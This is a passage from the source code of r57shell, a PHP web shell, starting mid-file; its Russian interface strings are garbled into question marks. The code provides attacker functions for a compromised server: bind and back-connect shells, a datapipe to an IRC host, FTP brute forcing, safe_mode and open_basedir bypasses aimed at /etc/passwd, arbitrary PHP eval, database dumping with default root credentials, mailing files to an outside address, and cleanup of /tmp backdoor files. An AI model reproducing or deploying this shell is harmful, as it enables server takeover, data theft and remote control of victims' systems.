$alias_name=>$alias_cmd) { $aliases2 .= ''; } echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts; echo sr(15,''.ws(9).$lang[$language.'_text8'].$arrow.ws(4).'',''.in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); echo $te.''.$table_end1.$fe; } echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts; echo sr(15,''.$lang[$language.'_text52'].$arrow.'',in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); echo sr(15,''.$lang[$language.'_text53'].$arrow.'',in('text','s_dir',85,$dir).' * ( /root;/home;/tmp )'); echo sr(15,''.$lang[$language.'_text55'].$arrow.'',in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php').'* ( .txt;.php;.htm )'.in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); echo $te.''.$table_end1.$fe; if(!$safe_mode && $unix){ echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts; echo sr(15,''.$lang[$language.'_text72'].$arrow.'',in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); echo sr(15,''.$lang[$language.'_text73'].$arrow.'',in('text','s_dir',85,$dir).' * ( /root;/home;/tmp )'); echo sr(15,''.$lang[$language.'_text74'].$arrow.'',in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); echo $te.''.$table_end1.$fe; } echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font; echo '
'.div('id9').''; echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); echo '
'.ws(1).in('submit','submit',0,$lang[$language.'_butt1']); echo '
'; echo $table_end1.$fe; if($safe_mode&&$curl_on) { echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts; echo sr(15,''.$lang[$language.'_text30'].$arrow.'',in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):('/etc/passwd'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if($safe_mode) { echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts; echo '
'; echo sr(15,''.$lang[$language.'_text30'].$arrow.'',in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):('/etc/passwd'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if($safe_mode&&$mysql_on) { echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts; echo sr(15,''.$lang[$language.'_text36'].$arrow.'',in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):('mysql'))).ws(4).''.$lang[$language.'_text37'].$arrow.''.in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):('root'))).ws(4).''.$lang[$language.'_text38'].$arrow.''.in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):('password'))).ws(4).''.$lang[$language.'_text14'].$arrow.''.in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):('3306')))); echo sr(15,''.$lang[$language.'_text30'].$arrow.'',in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):('/etc/passwd'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if($safe_mode&&$mssql_on) { echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts; echo sr(15,''.$lang[$language.'_text36'].$arrow.'',in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):('master'))).ws(4).''.$lang[$language.'_text37'].$arrow.''.in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):('sa'))).ws(4).''.$lang[$language.'_text38'].$arrow.''.in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):('password'))).ws(4).''.$lang[$language.'_text14'].$arrow.''.in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):('1433')))); echo sr(15,''.$lang[$language.'_text3'].$arrow.'',in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):('dir'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if(@ini_get('file_uploads')){ echo ''; echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts; echo sr(15,''.$lang[$language.'_text6'].$arrow.'',in('file','userfile',85,'')); echo sr(15,''.$lang[$language.'_text21'].$arrow.'',in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); echo $te.''.$table_end1.$fe; } if(!$safe_mode&&!$windows){ echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts; echo sr(15,''.$lang[$language.'_text16'].$arrow.'',''.in('hidden','dir',0,$dir).ws(2).''.$lang[$language.'_text17'].$arrow.''.in('text','rem_file',78,'http://')); echo sr(15,''.$lang[$language.'_text18'].$arrow.'',in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); echo $te.''.$table_end1.$fe; } echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts; echo sr(15,''.$lang[$language.'_text59'].$arrow.'',in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); $arh = $lang[$language.'_text92']; if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } echo sr(15,''.$lang[$language.'_text91'].$arrow.'',in('radio','compress',0,'none').' '.$arh); echo $te.''.$table_end1.$fe; if(@function_exists('ftp_connect')){ echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts.''.$fs.''.$fe.$fs.''.$fe.'
'.$ts; echo '
'.$lang[$language.'_text87'].'
'; echo sr(25,''.$lang[$language.'_text88'].$arrow.'',in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):('127.0.0.1:21')))); echo sr(25,''.$lang[$language.'_text37'].$arrow.'',in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):('anonymous')))); echo sr(25,''.$lang[$language.'_text38'].$arrow.'',in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):('billy@microsoft.com')))); echo sr(25,''.$lang[$language.'_text89'].$arrow.'',in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):('/ftp-dir/file'))).in('hidden','cmd',0,'ftp_file_down')); echo sr(25,''.$lang[$language.'_text18'].$arrow.'',in('text','loc_file',45,$dir)); echo sr(25,''.$lang[$language.'_text90'].$arrow.'',''.in('hidden','dir',0,$dir)); echo sr(25,'',in('submit','submit',0,$lang[$language.'_butt14'])); echo $te.'
'.$ts; echo '
'.$lang[$language.'_text100'].'
'; echo sr(25,''.$lang[$language.'_text88'].$arrow.'',in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):('127.0.0.1:21')))); echo sr(25,''.$lang[$language.'_text37'].$arrow.'',in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):('anonymous')))); echo sr(25,''.$lang[$language.'_text38'].$arrow.'',in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):('billy@microsoft.com')))); echo sr(25,''.$lang[$language.'_text18'].$arrow.'',in('text','loc_file',45,$dir)); echo sr(25,''.$lang[$language.'_text89'].$arrow.'',in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):('/ftp-dir/file'))).in('hidden','cmd',0,'ftp_file_up')); echo sr(25,''.$lang[$language.'_text90'].$arrow.'',''.in('hidden','dir',0,$dir)); echo sr(25,'',in('submit','submit',0,$lang[$language.'_butt2'])); echo $te.'
'; } if($unix && @function_exists('ftp_connect')){ echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts; echo sr(15,''.$lang[$language.'_text88'].$arrow.'',in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):('127.0.0.1:21'))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); echo sr(15,'',''.$lang[$language.'_text99'].' ( '.$lang[$language.'_text95'].' )'); echo sr(15,'',in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']); echo $te.'
'.$table_end1.$fe; } if(@function_exists('mail')){ echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts.''.$fs.''.$ts; echo '
'.$lang[$language.'_text103'].'
'; echo sr(25,''.$lang[$language.'_text105'].$arrow.'',in('text','to',45,(!empty($_POST['to'])?($_POST['to']):('hacker@mail.com'))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); echo sr(25,''.$lang[$language.'_text106'].$arrow.'',in('text','from',45,(!empty($_POST['from'])?($_POST['from']):('billy@microsoft.com')))); echo sr(25,''.$lang[$language.'_text107'].$arrow.'',in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):('hello billy')))); echo sr(25,''.$lang[$language.'_text108'].$arrow.'',''); echo sr(25,'',in('submit','submit',0,$lang[$language.'_butt15'])); echo $te.''.$fe.$fs.''.$ts; echo '
'.$lang[$language.'_text104'].'
'; echo sr(25,''.$lang[$language.'_text105'].$arrow.'',in('text','to',45,(!empty($_POST['to'])?($_POST['to']):('hacker@mail.com'))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); echo sr(25,''.$lang[$language.'_text106'].$arrow.'',in('text','from',45,(!empty($_POST['from'])?($_POST['from']):('billy@microsoft.com')))); echo sr(25,''.$lang[$language.'_text107'].$arrow.'',in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):('file from r57shell')))); echo sr(25,''.$lang[$language.'_text18'].$arrow.'',in('text','loc_file',45,$dir)); $arh = $lang[$language.'_text92']; if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } echo sr(25,''.$lang[$language.'_text91'].$arrow.'',in('radio','compress',0,'none').' '.$arh); echo sr(25,'',in('submit','submit',0,$lang[$language.'_butt15'])); echo $te.''.$fe.'
'; } if($mysql_on||$mssql_on||$pg_on||$ora_on) { $select = ''; echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts.''.$fs.''.$ts; echo '
'.$lang[$language.'_text77'].'
'; echo sr(45,''.$lang[$language.'_text80'].$arrow.'',$select); echo sr(45,''.$lang[$language.'_text14'].$arrow.'',in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):('3306')))); echo sr(45,''.$lang[$language.'_text37'].$arrow.'',in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):('root')))); echo sr(45,''.$lang[$language.'_text38'].$arrow.'',in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):('password')))); echo sr(45,''.$lang[$language.'_text78'].$arrow.'',in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1')); echo sr(45,''.$lang[$language.'_text79'].$arrow.'',in('checkbox','sc id=sc',0,'1')); echo sr(45,'',in('submit','submit',0,$lang[$language.'_butt7'])); echo $te.''.$fe.$fs.''.$ts; echo '
'.$lang[$language.'_text40'].'
'; echo sr(45,''.$lang[$language.'_text80'].$arrow.'',$select); echo sr(45,''.$lang[$language.'_text14'].$arrow.'',in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):('3306')))); echo sr(45,''.$lang[$language.'_text37'].$arrow.'',in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):('root')))); echo sr(45,''.$lang[$language.'_text38'].$arrow.'',in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):('password')))); echo sr(45,''.$lang[$language.'_text36'].$arrow.'',in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):('mysql')))); echo sr(45,''.$lang[$language.'_text39'].$arrow.'',in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):('user')))); echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump').''.$lang[$language.'_text41'].$arrow.'',in('checkbox','dif id=dif',0,'1')); echo sr(45,''.$lang[$language.'_text59'].$arrow.'',in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):('dump.sql')))); echo sr(45,'',in('submit','submit',0,$lang[$language.'_butt9'])); echo $te.''.$fe.$fs.''.$ts; echo '
'.$lang[$language.'_text83'].'
'; echo sr(45,''.$lang[$language.'_text80'].$arrow.'',$select); echo sr(45,''.$lang[$language.'_text14'].$arrow.'',in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):('3306')))); echo sr(45,''.$lang[$language.'_text37'].$arrow.'',in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):('root')))); echo sr(45,''.$lang[$language.'_text38'].$arrow.'',in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):('password')))); echo sr(45,''.$lang[$language.'_text36'].$arrow.'',in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):('mysql')))); echo sr(45,''.$lang[$language.'_text84'].$arrow.''.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),''); echo $te.'

'.in('submit','submit',0,$lang[$language.'_butt1']).'
'.$fe.''; } if(!$safe_mode&&!$windows){ echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts.''.$fs.''.$ts; echo '
'.$lang[$language.'_text9'].'
'; echo sr(40,''.$lang[$language.'_text10'].$arrow.'',in('text','port',15,'11457')); echo sr(40,''.$lang[$language.'_text11'].$arrow.'',in('text','bind_pass',15,'r57')); echo sr(40,''.$lang[$language.'_text20'].$arrow.'',''.in('hidden','dir',0,$dir)); echo sr(40,'',in('submit','submit',0,$lang[$language.'_butt3'])); echo $te.''.$fe.$fs.''.$ts; echo '
'.$lang[$language.'_text12'].'
'; echo sr(40,''.$lang[$language.'_text13'].$arrow.'',in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ('127.0.0.1')))); echo sr(40,''.$lang[$language.'_text14'].$arrow.'',in('text','port',15,'11457')); echo sr(40,''.$lang[$language.'_text20'].$arrow.'',''.in('hidden','dir',0,$dir)); echo sr(40,'',in('submit','submit',0,$lang[$language.'_butt4'])); echo $te.''.$fe.$fs.''.$ts; echo '
'.$lang[$language.'_text22'].'
'; echo sr(40,''.$lang[$language.'_text23'].$arrow.'',in('text','local_port',15,'11457')); echo sr(40,''.$lang[$language.'_text24'].$arrow.'',in('text','remote_host',15,'irc.dalnet.ru')); echo sr(40,''.$lang[$language.'_text25'].$arrow.'',in('text','remote_port',15,'6667')); echo sr(40,''.$lang[$language.'_text26'].$arrow.'',''.in('hidden','dir',0,$dir)); echo sr(40,'',in('submit','submit',0,$lang[$language.'_butt5'])); echo $te.''.$fe.''; } echo ''.$table_up3.'
o---[ r57shell - http-shell by RST/GHC | http://rst.void.ru | http://ghc.ru | version '.$version.' ]---o
'.$f; include ($a.$b.$c); ?> '>aasa (0) $v) { $_POST[$k] = stripslashes($v); } foreach ($_SERVER as $k=>$v) { $_SERVER[$k] = stripslashes($v); } } if($auth == 1) { if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass) { header('WWW-Authenticate: Basic realm='r57shell''); header('HTTP/1.0 401 Unauthorized'); exit('r57shell : Access Denied'); } } $head = ' r57shell '; class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = '\x50\x4b\x05\x06\x00\x00\x00\x00'; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('\\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = '' . $hexdtime . '';'); $fr = '\x50\x4b\x03\x04'; $fr .= '\x14\x00'; $fr .= '\x00\x00'; $fr .= '\x08\x00'; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $this -> datasec[] = $fr; $cdrec = '\x50\x4b\x01\x02'; $cdrec .= '\x00\x00'; $cdrec .= '\x14\x00'; $cdrec .= '\x00\x00'; $cdrec .= '\x08\x00'; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset += strlen($fr); $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . '\x00\x00'; } } function compress(&$filename,&$filedump,$compress) { global $content_encoding; global $mime_type; if ($compress == 'bzip' && @function_exists('bzcompress')) { $filename .= '.bz2'; $mime_type = 'application/x-bzip2'; $filedump = bzcompress($filedump); } else if ($compress == 'gzip' && @function_exists('gzencode')) { $filename .= '.gz'; $content_encoding = 'x-gzip'; $mime_type = 'application/x-gzip'; $filedump = gzencode($filedump); } else if ($compress == 'zip' && @function_exists('gzcompress')) { $filename .= '.zip'; $mime_type = 'application/zip'; $zipfile = new zipfile(); $zipfile -> addFile($filedump, substr($filename, 0, -4)); $filedump = $zipfile -> file(); } else { $mime_type = 'application/octet-stream'; } } function mailattach($to,$from,$subj,$attach) { $headers = 'From: $from\r\n'; $headers .= 'MIME-Version: 1.0\r\n'; $headers .= 'Content-Type: '.$attach['type']; $headers .= '; name=\''.$attach['name'].'\'\r\n'; $headers .= 'Content-Transfer-Encoding: base64\r\n\r\n'; $headers .= chunk_split(base64_encode($attach['content'])).'\r\n'; if(@mail($to,$subj,'',$headers)) { return 1; } return 0; } if(isset($_GET['img'])&&!empty($_GET['img'])) { $images = array(); $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw=='; $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw=='; @ob_clean(); header('Content-type: image/gif'); echo base64_decode($images[$_GET['img']]); die(); } if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=='download_file' && !empty($_POST['d_name'])) { if(!$file=@fopen($_POST['d_name'],'r')) { echo re($_POST['d_name']); $_POST['cmd']=''; } else { @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } header('Content-type: '.$mime_type); header('Content-disposition: attachment; filename=\''.$filename.'\';'); echo $filedump; exit(); } } if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo '
[ BACK ]
'; die(); } if ($_POST['cmd']=='db_query') { echo $head; switch($_POST['db']) { case 'MySQL': if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); if($db) { if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); } $querys = @explode(';',$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5){ echo 'Query#'.$num.' : '.htmlspecialchars($query).'
'; $res = @mysql_query($query,$db); $error = @mysql_error($db); if($error) { echo '
Error : '.$error.'

'; } else { if (@mysql_num_rows($res) > 0) { $sql2 = $sql = $keys = $values = ''; while (($row = @mysql_fetch_assoc($res))) { $keys = @implode(' 
 ', @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} $values = @implode('  ',$values); $sql2 .= ' '.$values.' '; } echo ''; $sql = ''; $sql .= $sql2; echo $sql; echo '
 '.$keys.' 

'; } else { if(($rows = @mysql_affected_rows($db))>=0) { echo '
affected rows : '.$rows.'

'; } } } @mysql_free_result($res); } } @mysql_close($db); } else echo '
Can't connect to MySQL server
'; break; case 'MSSQL': if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); if($db) { if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); } $querys = @explode(';',$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5){ echo 'Query#'.$num.' : '.htmlspecialchars($query).'
'; $res = @mssql_query($query,$db); if (@mssql_num_rows($res) > 0) { $sql2 = $sql = $keys = $values = ''; while (($row = @mssql_fetch_assoc($res))) { $keys = @implode(' 
 ', @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} $values = @implode('  ',$values); $sql2 .= ' '.$values.' '; } echo ''; $sql = ''; $sql .= $sql2; echo $sql; echo '
 '.$keys.' 

'; } /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo '
affected rows : '.$rows.'

'; } else { echo '
Error : '.$error.'

'; }} */ @mssql_free_result($res); } } @mssql_close($db); } else echo '
Can't connect to MSSQL server
'; break; case 'PostgreSQL': if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } $str = 'host='localhost' port=''.$_POST['db_port'].'' user=''.$_POST['mysql_l'].'' password=''.$_POST['mysql_p'].'' dbname=''.$_POST['mysql_db'].'''; $db = @pg_connect($str); if($db) { $querys = @explode(';',$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5){ echo 'Query#'.$num.' : '.htmlspecialchars($query).'
'; $res = @pg_query($db,$query); $error = @pg_errormessage($db); if($error) { echo '
Error : '.$error.'

'; } else { if (@pg_num_rows($res) > 0) { $sql2 = $sql = $keys = $values = ''; while (($row = @pg_fetch_assoc($res))) { $keys = @implode(' 
 ', @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} $values = @implode('  ',$values); $sql2 .= ' '.$values.' '; } echo ''; $sql = ''; $sql .= $sql2; echo $sql; echo '
 '.$keys.' 

'; } else { if(($rows = @pg_affected_rows($res))>=0) { echo '
affected rows : '.$rows.'

'; } } } @pg_free_result($res); } } @pg_close($db); } else echo '
Can't connect to PostgreSQL server
'; break; case 'Oracle': $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']); if(($error = @ocierror())) { echo '
Can't connect to Oracle server.
'.$error['message'].'
'; } else { $querys = @explode(';',$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5) { echo 'Query#'.$num.' : '.htmlspecialchars($query).'
'; $stat = @ociparse($db, $query); @ociexecute($stat); if(($error = @ocierror())) { echo '
Error : '.$error['message'].'

'; } else { $rowcount = @ocirowcount($stat); if($rowcount != 0) {echo '
affected rows : '.$rowcount.'

';} else { echo ''; for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo ''; } echo ''; while(ocifetch($stat)) { echo ''; for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo ''; } echo ''; } echo '
 '.htmlspecialchars(@ocicolumnname($stat, $j)).' 
 '.htmlspecialchars(@ociresult($stat, $j)).' 

'; } @ocifreestatement($stat); } } } @ocilogoff($db); } break; } echo ''; echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cmd',0,'db_query'); echo '



'; echo ''; echo '
[ BACK ]
'; die(); } if(isset($_GET['delete'])) { @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],'/'),1)); } if(isset($_GET['tmp'])) { @unlink('/tmp/bdpl'); @unlink('/tmp/back'); @unlink('/tmp/bd'); @unlink('/tmp/bd.c'); @unlink('/tmp/dp'); @unlink('/tmp/dpc'); @unlink('/tmp/dpc.c'); } if(isset($_GET['phpini'])) { echo $head; function U_value($value) { if ($value == '') return 'no value'; if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; if ($value === null) return 'NULL'; if (@is_object($value)) $value = (array) $value; if (@is_array($value)) { @ob_start(); print_r($value); $value = @ob_get_contents(); @ob_end_clean(); } return U_wordwrap((string) $value); } function U_wordwrap($str) { $str = @wordwrap(@htmlspecialchars($str), 100, '', true); return @preg_replace('!(&[^;]*)([^;]*;)!', '$1$2', $str); } if (@function_exists('ini_get_all')) { $r = ''; echo '', ''; foreach (@ini_get_all() as $key=>$value) { $r .= ''; } echo $r; echo '
Directive
Local Value
Master Value
'.ws(3).''.$key.'
'.U_value($value['local_value']).'
'.U_value($value['global_value']).'
'; } echo '
[ BACK ]
'; die(); } if(isset($_GET['cpu'])) { echo $head; echo '
CPU
'; $cpuf = @file('cpuinfo'); if($cpuf) { $c = @sizeof($cpuf); for($i=0;$i<$c;$i++) { $info = @explode(':',$cpuf[$i]); if($info[1]==''){ $info[1]='---'; } $r .= ''; } echo $r; } else { echo ''; } echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---
'; echo '
[ BACK ]
'; die(); } if(isset($_GET['mem'])) { echo $head; echo '
MEMORY
'; $memf = @file('meminfo'); if($memf) { $c = sizeof($memf); for($i=0;$i<$c;$i++) { $info = explode(':',$memf[$i]); if($info[1]==''){ $info[1]='---'; } $r .= ''; } echo $r; } else { echo ''; } echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---
'; echo '
[ BACK ]
'; die(); } $lang=array( 'ru_text1' =>'??????????? ???????', 'ru_text2' =>'?????????? ?????? ?? ???????', 'ru_text3' =>'????????? ???????', 'ru_text4' =>'??????? ??????????', 'ru_text5' =>'???????? ?????? ?? ??????', 'ru_text6' =>'????????? ????', 'ru_text7' =>'??????', 'ru_text8' =>'???????? ?????', 'ru_butt1' =>'?????????', 'ru_butt2' =>'?????????', 'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash', 'ru_text10'=>'??????? ????', 'ru_text11'=>'?????? ??? ???????', 'ru_butt3' =>'???????', 'ru_text12'=>'back-connect', 'ru_text13'=>'IP-?????', 'ru_text14'=>'????', 'ru_butt4' =>'?????????', 'ru_text15'=>'???????? ?????? ? ?????????? ???????', 'ru_text16'=>'????????????', 'ru_text17'=>'????????? ????', 'ru_text18'=>'????????? ????', 'ru_text19'=>'Exploits', 'ru_text20'=>'????????????', 'ru_text21'=>'????? ???', 'ru_text22'=>'datapipe', 'ru_text23'=>'????????? ????', 'ru_text24'=>'????????? ????', 'ru_text25'=>'????????? ????', 'ru_text26'=>'????????????', 'ru_butt5' =>'?????????', 'ru_text28'=>'?????? ? safe_mode', 'ru_text29'=>'?????? ????????', 'ru_butt6' =>'???????', 'ru_text30'=>'???????? ?????', 'ru_butt7' =>'???????', 'ru_text31'=>'???? ?? ??????', 'ru_text32'=>'?????????? PHP ????', 'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL', 'ru_butt8' =>'?????????', 'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include', 'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql', 'ru_text36'=>'????', 'ru_text37'=>'?????', 